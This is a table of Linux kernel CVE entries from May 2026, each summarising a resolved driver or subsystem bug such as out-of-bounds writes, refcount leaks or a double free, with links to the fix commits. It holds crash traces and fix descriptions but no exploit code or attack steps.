| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: gadget: Move vbus draw to workqueue context Currently dwc3_gadget_vbus_draw() can be called from atomic context, which in turn invokes power-supply-core APIs. And some of these PMIC APIs have operations that may sleep, leading to a kernel panic. Fix this by moving the vbus_draw into a workqueue context. | 2026-05-06 | not yet calculated | CVE-2026-43170 | https://git.kernel.org/stable/c/76c1123ffccfaba95cf4ecc2a50f95504a522424 https://git.kernel.org/stable/c/a7a80c25b65112768eeba58a7af129d3c52a6d90 https://git.kernel.org/stable/c/2333653ef854c2cc124077f71a8526f03bf6e06a https://git.kernel.org/stable/c/74a231e3d99d310497ab0ccb359539a6063b316a https://git.kernel.org/stable/c/54aaa3b387c2f580a99dc86a9cc2eb6dfaf599a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: EFI/CPER: don't dump the entire memory region The current logic at cper_print_fw_err() doesn't check if the error record length is big enough to handle the offset. On bad firmware, if the offset is above the actual record, length -= offset will underflow, making it dump the entire memory. The end result can be: - the logic taking a lot of time dumping large regions of memory; - data disclosure due to the memory dumps; - an OOPS, if it tries to dump an unmapped memory region. Fix it by checking if the section length is too small before doing a hex dump. [ rjw: Subject tweaks ] | 2026-05-06 | not yet calculated | CVE-2026-43171 | https://git.kernel.org/stable/c/02de64ab54b4bb0f1b21bb324aeff3b08612be33 https://git.kernel.org/stable/c/0e09b522f2622841389c3b2f9ac4969e35c0809d https://git.kernel.org/stable/c/64ae5aaa7ac93c83da456039e8ec747bfa8a7cff https://git.kernel.org/stable/c/5a9b1dda8481b82851a655c3bcc5b44879b95334 https://git.kernel.org/stable/c/7780c0bad2a3a70a8c0113a33c02f4151d901eb3 https://git.kernel.org/stable/c/a8419f5f2c5f2d80848ddabb2b95cf0da84a5f91 https://git.kernel.org/stable/c/54e131db4cdffd946db890ff33ff2647053fd4f6 https://git.kernel.org/stable/c/55cc6fe5716f678f06bcb95140882dfa684464ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ethernet: xscale: Check for PTP support properly In ixp4xx_get_ts_info() ixp46x_ptp_find() is called unconditionally despite this feature only existing on ixp46x, leading to the following splat from tcpdump: root@OpenWrt:~# tcpdump -vv -X -i eth0 (...) Unable to handle kernel NULL pointer dereference at virtual address 00000238 when read (...) Call trace: ptp_clock_index from ixp46x_ptp_find+0x1c/0x38 ixp46x_ptp_find from ixp4xx_get_ts_info+0x4c/0x64 ixp4xx_get_ts_info from __ethtool_get_ts_info+0x90/0x108 __ethtool_get_ts_info from __dev_ethtool+0xa00/0x2648 __dev_ethtool from dev_ethtool+0x160/0x234 dev_ethtool from dev_ioctl+0x2cc/0x460 dev_ioctl from sock_ioctl+0x1ec/0x524 sock_ioctl from sys_ioctl+0x51c/0xa94 sys_ioctl from ret_fast_syscall+0x0/0x44 (...) Segmentation fault Check for ixp46x in ixp46x_ptp_find() before trying to set up PTP to avoid this. To avoid altering the error code returned from ixp4xx_hwtstamp_set(), which before this patch was -EOPNOTSUPP, we return -EOPNOTSUPP from ixp4xx_hwtstamp_set() if ixp46x_ptp_find() fails, no matter the error code. The helper function ixp46x_ptp_find() itself returns -ENODEV. | 2026-05-06 | not yet calculated | CVE-2026-43173 | https://git.kernel.org/stable/c/144dde3146985b25fa84d4e4b7c3d11e0f5fc5a4 https://git.kernel.org/stable/c/5195b10c34b8993194ad12ad7d8f54d861be084b https://git.kernel.org/stable/c/322437972f0a712767f6920ad34aba25f2e9b942 https://git.kernel.org/stable/c/21d1e80d0d6e7d0c3cd8b1e001ed1fa92fb9f3f5 https://git.kernel.org/stable/c/2d74412dfd3621552a394d55cc3dd26a7cbf608e https://git.kernel.org/stable/c/cbecebd35909f6cd0f6fb773f0fb73da99e02f8c https://git.kernel.org/stable/c/594163ea88a03bdb412063af50fc7177ef3cbeae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/zcrx: fix post open error handling Closing a queue doesn't guarantee that all associated page pools are terminated right away, let the refcounting do the work instead of releasing the zcrx ctx directly. | 2026-05-06 | not yet calculated | CVE-2026-43174 | https://git.kernel.org/stable/c/18afaff077b46655a8eb6fd7f6de1b81327be577 https://git.kernel.org/stable/c/5d540e4508950c674d6feef1d95463d039bbf4f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: rs9: Reserve 8 struct clk_hw slots for 9FGV0841 The 9FGV0841 has 8 outputs and registers 8 struct clk_hw, so make sure there are 8 slots for those newly registered clk_hw pointers, else there is going to be an out-of-bounds write when pointers 4..7 are set into the struct rs9_driver_data .clk_dif[4..7] field. Since there are other structure members past this struct clk_hw pointer array, writing to the .clk_dif[4..7] fields corrupts both the struct rs9_driver_data content and data around it, sometimes without crashing the kernel. However, the kernel does surely crash when the driver is unbound or during suspend. Fix this by increasing the struct clk_hw pointer array size to the maximum output count of the 9FGV0841, which is the biggest chip supported by this driver. | 2026-05-06 | not yet calculated | CVE-2026-43175 | https://git.kernel.org/stable/c/2f926875dffe2226ea26d129e16d9092cccd03aa https://git.kernel.org/stable/c/da86ca15d7389ee0b5df08e8f70c39354e6b8a4b https://git.kernel.org/stable/c/82a34f344999d8029bcebf131028fa519140c7cc https://git.kernel.org/stable/c/5ec820fc28d0b8a0f3890d476b1976f20e8343cc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: ipu6: Fix RPM reference leak in probe error paths Several error paths in ipu6_pci_probe() were jumping directly to out_ipu6_bus_del_devices without releasing the runtime PM reference. Add pm_runtime_put_sync() before cleaning up other resources. | 2026-05-06 | not yet calculated | CVE-2026-43177 | https://git.kernel.org/stable/c/fdc06d36dab7b28c2bdd16cb7ee4f25e0f55d9ac https://git.kernel.org/stable/c/364759ccc3fb49754758c585c530407f96683030 https://git.kernel.org/stable/c/3cd9e7539a3010a83391fecade1186cf30e616c9 https://git.kernel.org/stable/c/6099f78e4c9223f4de4169d2fd1cded01279da1a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix incorrect early exits for invalid metabox-enabled images Crafted EROFS images with metadata compression enabled can trigger incorrect early returns, leading to folio reference leaks. However, this does not cause system crashes or other severe issues. | 2026-05-06 | not yet calculated | CVE-2026-43179 | https://git.kernel.org/stable/c/041b5163bb9b2e81050bcd885b3373bf2f42d5f5 https://git.kernel.org/stable/c/56e4a84220045b6af0f1efc11825b39217c7decf https://git.kernel.org/stable/c/643575d5a4f24b23b0c54aa20aa74a4abed8ff5e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpio: sysfs: fix chip removal with GPIOs exported over sysfs Currently if we export a GPIO over sysfs and unbind the parent GPIO controller, the exported attribute will remain under /sys/class/gpio because once we remove the parent device, we can no longer associate the descriptor with it in gpiod_unexport() and never drop the final reference. Rework the teardown code: provide an unlocked variant of gpiod_unexport() and remove all exported GPIOs with the sysfs_lock taken before unregistering the parent device itself. This is done to prevent any new exports happening before we unregister the device completely. | 2026-05-06 | not yet calculated | CVE-2026-43181 | https://git.kernel.org/stable/c/54f463494eb5bf193ef7d904a493474c451734df https://git.kernel.org/stable/c/a645cc25904b0baf508b77a0402ce151212b9800 https://git.kernel.org/stable/c/6766f59012301f1bf3f46c6e7149caca45d92309 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: ccs: Avoid possible division by zero Calculating the maximum M for scaler configuration involves dividing by the MIN_X_OUTPUT_SIZE limit register's value. Albeit the value is presumably non-zero, the driver was missing the check that it in fact was. Fix this. | 2026-05-06 | not yet calculated | CVE-2026-43182 | https://git.kernel.org/stable/c/b6e0529c300e44153fc6f3b565e28163caf1f031 https://git.kernel.org/stable/c/9aae0f31d37a8facd25e37c0f0709ea08de83802 https://git.kernel.org/stable/c/c9af1818387f5c6f543e2e02c40b3038eae86be8 https://git.kernel.org/stable/c/32a21ed2ad743fe2d12af48e627089b921a032c2 https://git.kernel.org/stable/c/a8ff58cc8c7514c278ba0ea2c787d4bf9eeb355d https://git.kernel.org/stable/c/8ca7df18e7a58a0e5b0ed9eaaa34e16fc5cb9680 https://git.kernel.org/stable/c/679f0b7b6a409750a25754c8833e268e5fdde742 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: cx25821: Fix a resource leak in cx25821_dev_setup() Add release_mem_region() if ioremap() fails to release the memory region obtained by cx25821_get_resources(). | 2026-05-06 | not yet calculated | CVE-2026-43183 | https://git.kernel.org/stable/c/9f1c926248bde95a77ca104ab525467470607836 https://git.kernel.org/stable/c/071bfc6e723aabbbf08f0d439fb913cd01eb8de2 https://git.kernel.org/stable/c/f7759eb6738ee9fc296f6ab1705c6809947976f3 https://git.kernel.org/stable/c/4010e596d23cda6de65acb14f7fd4ce8289f1d49 https://git.kernel.org/stable/c/e220ec4c4596d634685b8a08d79ad876a720b466 https://git.kernel.org/stable/c/b7210170b10e2d17f7a4f6b9d39cc092442db860 https://git.kernel.org/stable/c/80ce3797dc99dae4ce8b939626b891c9eb85139f https://git.kernel.org/stable/c/68cd8ac994cac38a305200f638b30e13c690753b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: do not propagate page array emplacement errors as batch errors When fscrypt is enabled, move_dirty_folio_in_page_array() may fail because it needs to allocate bounce buffers to store the encrypted versions of each folio. Each folio beyond the first allocates its bounce buffer with GFP_NOWAIT. Failures are common (and expected) under this allocation mode; they should flush (not abort) the batch. However, ceph_process_folio_batch() uses the same `rc` variable for its own return code and for capturing the return codes of its routine calls; failing to reset `rc` back to 0 results in the error being propagated out to the main writeback loop, which cannot actually tolerate any errors here: once `ceph_wbc.pages` is allocated, it must be passed to ceph_submit_write() to be freed. If it survives until the next iteration (e.g. due to the goto being followed), ceph_allocate_page_array()'s BUG_ON() will oops the worker. Note that this failure mode is currently masked due to another bug (addressed next in this series) that prevents multiple encrypted folios from being selected for the same write. For now, just reset `rc` when redirtying the folio to prevent errors in move_dirty_folio_in_page_array() from propagating. Note that move_dirty_folio_in_page_array() is careful never to return errors on the first folio, so there is no need to check for that. After this change, ceph_process_folio_batch() no longer returns errors; its only remaining failure indicator is `locked_pages == 0`, which the caller already handles correctly. | 2026-05-06 | not yet calculated | CVE-2026-43188 | https://git.kernel.org/stable/c/746840c87d76b614b14d9337c466ff022fc49823 https://git.kernel.org/stable/c/4c0d84c788d89c167abf0bf84fd37890c4c84f08 https://git.kernel.org/stable/c/707104682e3c163f7c14cdd6b07a3e95fb374759 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: v4l2-async: Fix error handling on steps after finding a match Once an async connection is found to be matching with an fwnode, a sub-device may be registered (in case it wasn't already), its bound operation is called, ancillary links are created, the async connection is added to the sub-device's list of connections and removed from the global waiting connection list. Further on, the sub-device's possible own notifier is searched for possible additional matches. Fix these specific issues: - If v4l2_async_match_notify() failed before the sub-notifier handling, the async connection was unbound and its entry removed from the sub-device's async connection list. The latter part was also done in v4l2_async_match_notify(). - The async connection's sd field was only set after creating ancillary links in v4l2_async_match_notify(). It was however dereferenced in v4l2_async_unbind_subdev_one(), which was called on error path of v4l2_async_match_notify() failure. | 2026-05-06 | not yet calculated | CVE-2026-43189 | https://git.kernel.org/stable/c/30aaed311f973f13ba13a0cd2dc0202f595fff48 https://git.kernel.org/stable/c/461733d83e67ba7e3a5b750c0d203f738e01244f https://git.kernel.org/stable/c/b02bcb378efa8af07827f49b3afcc5e825318c55 https://git.kernel.org/stable/c/2de0a3c8148fc3dbea21981e6569f550b3626119 https://git.kernel.org/stable/c/7345d6d356336c448d6b9230ed8704f39679fd12 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Adjust PHY FSM transition to TX_EN-to-PLL_ON for TMDS on DCN35 [Why] A backport of the change made for DCN401 that addresses an issue where we turn off the PHY PLL when disabling TMDS output, which causes the OTG to remain stuck. The OTG being stuck can lead to a hang in the DCHVM's ability to ACK invalidations when it thinks the HUBP is still on but it's not receiving global sync. The transition to PLL_ON needs to be atomic as there's no guarantee that the thread isn't pre-empted or is able to complete before the IOMMU watchdog times out. [How] Backport the implementation from dcn401 back to dcn35. There's a functional difference in when the eDP output is disabled in dcn401 code so we don't want to utilize it directly. | 2026-05-06 | not yet calculated | CVE-2026-43191 | https://git.kernel.org/stable/c/d1f7ceb00e8956ff6d183b7b45ef4e73c96f4c51 https://git.kernel.org/stable/c/75372d75a4e23783583998ed99d5009d555850da |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm mpath: Add missing dm_put_device when failing to get scsi dh name When commit fd81bc5cca8f ("scsi: device_handler: Return error pointer in scsi_dh_attached_handler_name()") added code to fail parsing the path if scsi_dh_attached_handler_name() failed with -ENOMEM, it didn't clean up the reference to the path device that had just been taken. Fix this, and streamline the error paths of parse_path() a little. | 2026-05-06 | not yet calculated | CVE-2026-43192 | https://git.kernel.org/stable/c/4aa5c37b7d8019f7296111c1add00e7214baae60 https://git.kernel.org/stable/c/787bd63ee661b0148ce8e1fde92b7afddd85c446 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: fix nfs4_file refcount leak in nfsd_get_dir_deleg() Claude pointed out that there is a nfs4_file refcount leak in nfsd_get_dir_deleg(). Ensure that the reference to "fp" is released before returning. | 2026-05-06 | not yet calculated | CVE-2026-43193 | https://git.kernel.org/stable/c/0d8362e15aad5b5c1d6a65bb23ac6c45ccf881f3 https://git.kernel.org/stable/c/789477b849394afdb60507924d65f7ef18f078ce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: validate user queue size constraints Add validation to ensure user queue sizes meet hardware requirements: - Size must be a power of two for efficient ring buffer wrapping - Size must be at least AMDGPU_GPU_PAGE_SIZE to prevent undersized allocations This prevents invalid configurations that could lead to GPU faults or unexpected behavior. | 2026-05-06 | not yet calculated | CVE-2026-43195 | https://git.kernel.org/stable/c/cf2a37be899dc1b01f53bf1d0157330eaf3e3f55 https://git.kernel.org/stable/c/9f6cc309cd15922fe58cab2dfa1b5993ad31dec7 https://git.kernel.org/stable/c/8079b87c02e531cc91601f72ea8336dd2262fdf1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: ti: pruss: Fix double free in pruss_clk_mux_setup() In the pruss_clk_mux_setup(), the devm_add_action_or_reset() indirectly calls pruss_of_free_clk_provider(), which calls of_node_put(clk_mux_np) on the error path. However, after the devm_add_action_or_reset() returns, the of_node_put(clk_mux_np) is called again, causing a double free. Fix by returning directly, to avoid the duplicate of_node_put(). | 2026-05-06 | not yet calculated | CVE-2026-43196 | https://git.kernel.org/stable/c/dbda01bf2dfe5af33163e1e5fca1b82b619c2803 https://git.kernel.org/stable/c/24c40076e3bc3d73c839c886d6bda1da6c4d9b93 https://git.kernel.org/stable/c/818cf66d91c8ef09b01664a12d5f4ea786d64396 https://git.kernel.org/stable/c/e113339cc7d23be4948891f3a702e9dce5b47035 https://git.kernel.org/stable/c/69aa67c1e22d13e9aad4b08c86304ad8e743dcab https://git.kernel.org/stable/c/b7db9953c2f8da37de498198623b05b46f8e2ca0 https://git.kernel.org/stable/c/04dbbb18cc9c8795c9ff47d8994bc03ebfef9d68 https://git.kernel.org/stable/c/80db65d4acfb9ff12d00172aed39ea8b98261aad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: endpoint: Fix swapped parameters in pci_{primary/secondary}_epc_epf_unlink() functions struct configfs_item_operations callbacks are defined like the following: int (*allow_link)(struct config_item *src, struct config_item *target); void (*drop_link)(struct config_item *src, struct config_item *target); While pci_primary_epc_epf_link() and pci_secondary_epc_epf_link() specify the parameters in the correct order, pci_primary_epc_epf_unlink() and pci_secondary_epc_epf_unlink() specify the parameters in the wrong order, leading to the below kernel crash when using the unlink command in configfs: Unable to handle kernel paging request at virtual address 0000000300000857 Mem abort info: ... pc : string+0x54/0x14c lr : vsnprintf+0x280/0x6e8 ... string+0x54/0x14c vsnprintf+0x280/0x6e8 vprintk_default+0x38/0x4c vprintk+0xc4/0xe0 pci_epf_unbind+0xdc/0x108 configfs_unlink+0xe0/0x208+0x44/0x74 vfs_unlink+0x120/0x29c __arm64_sys_unlinkat+0x3c/0x90 invoke_syscall+0x48/0x134 do_el0_svc+0x1c/0x30prop.0+0xd0/0xf0 [mani: cced stable, changed commit message as per https://lore.kernel.org/linux-pci/aV9joi3jF1R6ca02@ryzen] | 2026-05-06 | not yet calculated | CVE-2026-43200 | https://git.kernel.org/stable/c/58686bf62cb38b92e4b28408162a5703775b4d12 https://git.kernel.org/stable/c/1c96c1acef4b4a1108fc13f84a8ac0b0633bbb46 https://git.kernel.org/stable/c/142b1bba3299264b76ed8ef53cd93b2b2af65d6c https://git.kernel.org/stable/c/339191811e6fc4559c4008c5af7a91b05086d596 https://git.kernel.org/stable/c/733cbc3aa97e71cc70847e75c925b364cc9b04a6 https://git.kernel.org/stable/c/aefc0e0bd20f54abe3b501b8798c0be656af272b https://git.kernel.org/stable/c/8754dd7639ab0fd68c3ab9d91c7bdecc3e5740a8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: APEI/GHES: ARM processor Error: don't go past allocated memory If the BIOS generates a very small ARM Processor Error, or an incomplete one, the current logic will fail to dereference err->section_length and ctx_info->size. Add checks to avoid that. With such changes, such GHESv2 records won't cause OOPSes like this: [ 1.492129] Internal error: Oops: 0000000096000005 [#1] SMP [ 1.495449] Modules linked in: [ 1.495820] CPU: 0 UID: 0 PID: 9 Comm: kworker/0:0 Not tainted 6.18.0-rc1-00017-gabadcc3553dd-dirty #18 PREEMPT [ 1.496125] Hardware name: QEMU QEMU Virtual Machine, BIOS unknown 02/02/2022 [ 1.496433] Workqueue: kacpi_notify acpi_os_execute_deferred [ 1.496967] pstate: 814000c5 (Nzcv daIF +PAN -UAO -TCO +DIT -SSBS BTYPE=--) [ 1.497199] pc : log_arm_hw_error+0x5c/0x200 [ 1.497380] lr : ghes_handle_arm_hw_error+0x94/0x220 0xffff8000811c5324 is in log_arm_hw_error (../drivers/ras/ras.c:75). 70 err_info = (struct cper_arm_err_info *)(err + 1); 71 ctx_info = (struct cper_arm_ctx_info *)(err_info + err->err_info_num); 72 ctx_err = (u8 *)ctx_info; 73 74 for (n = 0; n < err->context_info_num; n++) { 75 sz = sizeof(struct cper_arm_ctx_info) + ctx_info->size; 76 ctx_info = (struct cper_arm_ctx_info *)((long)ctx_info + sz); 77 ctx_len += sz; 78 } 79 and similar ones while trying to access section_length on an error dump with too small a size. [ rjw: Subject tweaks ] | 2026-05-06 | not yet calculated | CVE-2026-43201 | https://git.kernel.org/stable/c/242c652849d979d0133c315a42d9acea0ff88390 https://git.kernel.org/stable/c/136093ba4161e0080088abff48273f6830a47766 https://git.kernel.org/stable/c/db103b8bd3a4aca69b1b5fe8831a6ed75ac4b3bd https://git.kernel.org/stable/c/87880af2d24e62a84ed19943dbdd524f097172f2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: vt8500lcdfb: fix missing dma_free_coherent() fbi->fb.screen_buffer is allocated with dma_alloc_coherent() but is not freed if the error path is reached. | 2026-05-06 | not yet calculated | CVE-2026-43202 | https://git.kernel.org/stable/c/9a9bc60ed372aaae9784ff8ad8e5f496ff15fd31 https://git.kernel.org/stable/c/9c3873cccb3fab54cde0605ae7093d332c99073e https://git.kernel.org/stable/c/778f31be5b8c10024db23fdd8a05f68a02311008 https://git.kernel.org/stable/c/e8c5d5f6cd66e032f9aefdcc21b0c34761aef78a https://git.kernel.org/stable/c/f47d5b9e8aa6178a0aaf225119ad1ec7d3f49876 https://git.kernel.org/stable/c/40c1ff25025150ff6d7ec7ad441fcfd6d070ee76 https://git.kernel.org/stable/c/2cd2f988a8bd2da227f5c3cfa0cbf3a9a287ddc3 https://git.kernel.org/stable/c/88b3b9924337336a31cefbe99a22ed09401be74a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: qcom: q6asm: drop DSP responses for closed data streams 'Commit a354f030dbce ("ASoC: qcom: q6asm: handle the responses after closing")' attempted to ignore DSP responses arriving after a stream had been closed. However, those responses were still handled, causing lockups. Fix this by unconditionally dropping all DSP responses associated with closed data streams. | 2026-05-06 | not yet calculated | CVE-2026-43204 | https://git.kernel.org/stable/c/3249251eac6081d5169ba09f2d9cca66ab0cab0d https://git.kernel.org/stable/c/8a066a81ee0c1b6cdbd81393536c3b2d19ccef25 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dpaa2-switch: validate num_ifs to prevent out-of-bounds write The driver obtains sw_attr.num_ifs from firmware via dpsw_get_attributes() but never validates it against DPSW_MAX_IF (64). This value controls iteration in dpaa2_switch_fdb_get_flood_cfg(), which writes port indices into the fixed-size cfg->if_id[DPSW_MAX_IF] array. When firmware reports num_ifs >= 64, the loop can write past the array bounds. Add a bound check for num_ifs in dpaa2_switch_init(). dpaa2_switch_fdb_get_flood_cfg() appends the control interface (port num_ifs) after all matched ports. When num_ifs == DPSW_MAX_IF and all ports match the flood filter, the loop fills all 64 slots and the control interface write overflows by one entry. The check uses >= because num_ifs == DPSW_MAX_IF is also functionally broken. build_if_id_bitmap() silently drops any ID >= 64: if (id[i] < DPSW_MAX_IF) bmap[id[i] / 64] |= ... | 2026-05-06 | not yet calculated | CVE-2026-43205 | https://git.kernel.org/stable/c/a26dda3bae469c8e4e1b1993ad33dafa32d0fc28 https://git.kernel.org/stable/c/a3034a8d56174dd6464c46823438f25797910a8d https://git.kernel.org/stable/c/b690635d4719214892855b79ce018d4b1672ac96 https://git.kernel.org/stable/c/8b841fd529db9faf8bc678d429d4bf4e98b10900 https://git.kernel.org/stable/c/89764cf44544e943230f5e03b8c40a90da26537c https://git.kernel.org/stable/c/c18493f750208eb4ff1198fc5a02786b8b2d70a6 https://git.kernel.org/stable/c/8a5752c6dcc085a3bfc78589925182e4e98468c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: minix: Add required sanity checking to minix_check_superblock() The fs/minix implementation of the minix filesystem does not currently support any other value for s_log_zone_size than 0. This is also the only value supported in util-linux; see mkfs.minix.c line 511. In addition, this patch adds some sanity checking for the other minix superblock fields, and moves the minix_blocks_needed() checks for the zmap and imap also to minix_check_super_block(). This also closes a related syzbot bug report. | 2026-05-06 | not yet calculated | CVE-2026-43209 | https://git.kernel.org/stable/c/a051ecf5c5b0387840dc210413ed3bc7fbdaa69c https://git.kernel.org/stable/c/d791c544efd6b9c944b43cf7f502e5bcb02fb941 https://git.kernel.org/stable/c/66c7c239c65341f99ae388d4d53dc9df2bcb9925 https://git.kernel.org/stable/c/2bb588cede1c1969e49c0a2822c8cb8b346b7682 https://git.kernel.org/stable/c/f57ccd4657c7f082dc47e5b9e18a883bb5f9118f https://git.kernel.org/stable/c/31fefc18096cdc5549cfa54964d90e0b3229aedc https://git.kernel.org/stable/c/1efc128ee4adbc23e082715425ff895449d233bc https://git.kernel.org/stable/c/8c97a6ddc95690a938ded44b4e3202f03f15078c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing: ring-buffer: Fix to check event length before using Check the event length before adding it for accessing the next index in rb_read_data_buffer(). Since this function is used for validating possibly broken ring buffers, the length of the event could be broken. In that case, the new event (e + len) can point to a wrong address. To avoid invalid memory access at boot, check whether the length of each event is in the possible range before using it. | 2026-05-06 | not yet calculated | CVE-2026-43210 | https://git.kernel.org/stable/c/b4700c089a10f89de3a5149d57f8a58306458982 https://git.kernel.org/stable/c/5026010110a5ad2268d8c23e1e286ab7c736f7ac https://git.kernel.org/stable/c/9eb80e54494ef1efef8a64bec4ffa672c9cf411e https://git.kernel.org/stable/c/912b0ee248c529a4f45d1e7f568dc1adddbf2a4a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: Drop the lock in skb_may_tx_timestamp() skb_may_tx_timestamp() may acquire sock::sk_callback_lock. The lock must not be taken in IRQ context, only softirq is okay. A few drivers receive the timestamp via a dedicated interrupt and complete the TX timestamp from that handler. This will lead to a deadlock if the lock is already write-locked on the same CPU. Taking the lock can be avoided. The socket (pointed to by the skb) will remain valid until the skb is released. The ->sk_socket and ->file members will be set to NULL once the user closes the socket, which may happen before the timestamp arrives. If we happen to observe the pointer while the socket is closing but before the pointer is set to NULL then we may use it because both pointers (and the file's cred member) are RCU freed. Drop the lock. Use READ_ONCE() to obtain the individual pointers. Add a matching WRITE_ONCE() where the pointers are cleared. | 2026-05-06 | not yet calculated | CVE-2026-43216 | https://git.kernel.org/stable/c/f3e4cceafad27c9363c33622732f86722846ec6f https://git.kernel.org/stable/c/e4c6efb3b70ff87f1df99efce2f8893717695718 https://git.kernel.org/stable/c/983512f3a87fd8dc4c94dfa6b596b6e57df5aad7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: gen2: Add sanity check for session stop In iris_kill_session, inst->state is set to IRIS_INST_ERROR and session_close is executed, which will kfree(inst_hfi_gen2->packet). If stop_streaming is called afterward, it will cause a crash. Add a NULL check for inst_hfi_gen2->packet before sending the STOP packet to firmware to fix that. | 2026-05-06 | not yet calculated | CVE-2026-43217 | https://git.kernel.org/stable/c/72846441c5f6396de9face04e77fa3d28e9915b6 https://git.kernel.org/stable/c/75992ba43072674fd4767df62a1fe2048565cc60 https://git.kernel.org/stable/c/9aa8d63d09cfc44d879427cc5ba308012ca4ab8e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: i2c/tw9903: Fix potential memory leak in tw9903_probe() In one of the error paths in tw9903_probe(), the memory allocated in v4l2_ctrl_handler_init() and v4l2_ctrl_new_std() is not freed. Fix that by calling v4l2_ctrl_handler_free() on the handler in that error path. | 2026-05-06 | not yet calculated | CVE-2026-43218 | https://git.kernel.org/stable/c/e54aa17c968c4de2c5f7b7ea390c63d33c07513b https://git.kernel.org/stable/c/32f0493506313775d3bd448de34762b6538da6bd https://git.kernel.org/stable/c/92537a15780b6d0281fd8286f93fbc3652e35f48 https://git.kernel.org/stable/c/9cb9eca33d20316ed3c7a938793b8735ac3e128b https://git.kernel.org/stable/c/a114918270f0d95c607d69b03a244e6afe54813f https://git.kernel.org/stable/c/cc7aeed33e4f55c76f35f0fca73e4dfe12a63a3a https://git.kernel.org/stable/c/add02a3fb1fd71b004f0ed824cbac00f850de558 https://git.kernel.org/stable/c/9cea16fea47e5553f51d10957677ff735b1eff03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: cpsw_new: Fix potential unregister of netdev that has not been registered yet If an error occurs during register_netdev() for the first MAC in cpsw_register_ports(), even though cpsw->slaves[0].ndev is set to NULL, cpsw->slaves[1].ndev would remain unchanged. This could later cause cpsw_unregister_ports() to attempt unregistering the second MAC. To address this, add a check for ndev->reg_state before calling unregister_netdev(). With this change, setting cpsw->slaves[i].ndev to NULL becomes unnecessary and can be removed accordingly. | 2026-05-06 | not yet calculated | CVE-2026-43219 | https://git.kernel.org/stable/c/29739ec197ed66535bc0b86f14ab66c5f4512138 https://git.kernel.org/stable/c/349c4cac6f54a81fc107589771f88136a2b20415 https://git.kernel.org/stable/c/9d724b34fbe13b71865ad0906a4be97571f19cf5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/amd: serialize sequence allocation under concurrent TLB invalidations With concurrent TLB invalidations, completion wait randomly gets timed out because cmd_sem_val was incremented outside the IOMMU spinlock, allowing CMD_COMPL_WAIT commands to be queued out of sequence and breaking the ordering assumption in wait_on_sem(). Move the cmd_sem_val increment under iommu->lock so completion sequence allocation is serialized with command queuing. And remove the unnecessary return. | 2026-05-06 | not yet calculated | CVE-2026-43220 | https://git.kernel.org/stable/c/5000ce7fcb31067566a1a1a2e5b5bbff93625242 https://git.kernel.org/stable/c/48caa7542a795c9679ec1bd1bc2592e05a7369a4 https://git.kernel.org/stable/c/9e249c48412828e807afddc21527eb734dc9bd3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi: ipmb: initialise event handler read bytes IPMB doesn't use i2c reads, but the handler needs to set a value. Otherwise an i2c read will return an uninitialised value from the bus driver. | 2026-05-06 | not yet calculated | CVE-2026-43221 | https://git.kernel.org/stable/c/905554ebd76aeee370bfd5136ea11e0b9d75c6f1 https://git.kernel.org/stable/c/56d5c0557e53c4d8d92a619fa83eaae178165e07 https://git.kernel.org/stable/c/2dfbc8c17dd161885336e77e71c336cd62cf6748 https://git.kernel.org/stable/c/f726b3a57e00bb6249c67714c11ae8b4b31719a1 https://git.kernel.org/stable/c/102712417bb6aa9a00d852bc59cb0a276db486c4 https://git.kernel.org/stable/c/9f235ccecd03c436cb1683eac16b12f119e54aa9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: pvrusb2: fix URB leak in pvr2_send_request_ex When pvr2_send_request_ex() submits a write URB successfully but fails to submit the read URB (e.g. returns -ENOMEM), it returns immediately without waiting for the write URB to complete. Since the driver reuses the same URB structure, a subsequent call to pvr2_send_request_ex() attempts to submit the still-active write URB, triggering a 'URB submitted while active' warning in usb_submit_urb(). Fix this by ensuring the write URB is unlinked and waited upon if the read URB submission fails. | 2026-05-06 | not yet calculated | CVE-2026-43223 | https://git.kernel.org/stable/c/da524c939b1e5ba17f10db4bde4bdaf569ffcda6 https://git.kernel.org/stable/c/cf459d6ffa5e150ef3744b897f936ff24b52bd15 https://git.kernel.org/stable/c/77a63f8efc434ddb04667ed632aade58301a2f13 https://git.kernel.org/stable/c/4ba5c7a1aade7090172cbffd4d120bf4cf5ccbde https://git.kernel.org/stable/c/58dd722b6c3debcddb4684fb256c90fee7f063e5 https://git.kernel.org/stable/c/2011929f0e4cf6a0a34dd6205911b12276904453 https://git.kernel.org/stable/c/5f3ac816861c3b8a5d1a3645b17dc3a99d668d94 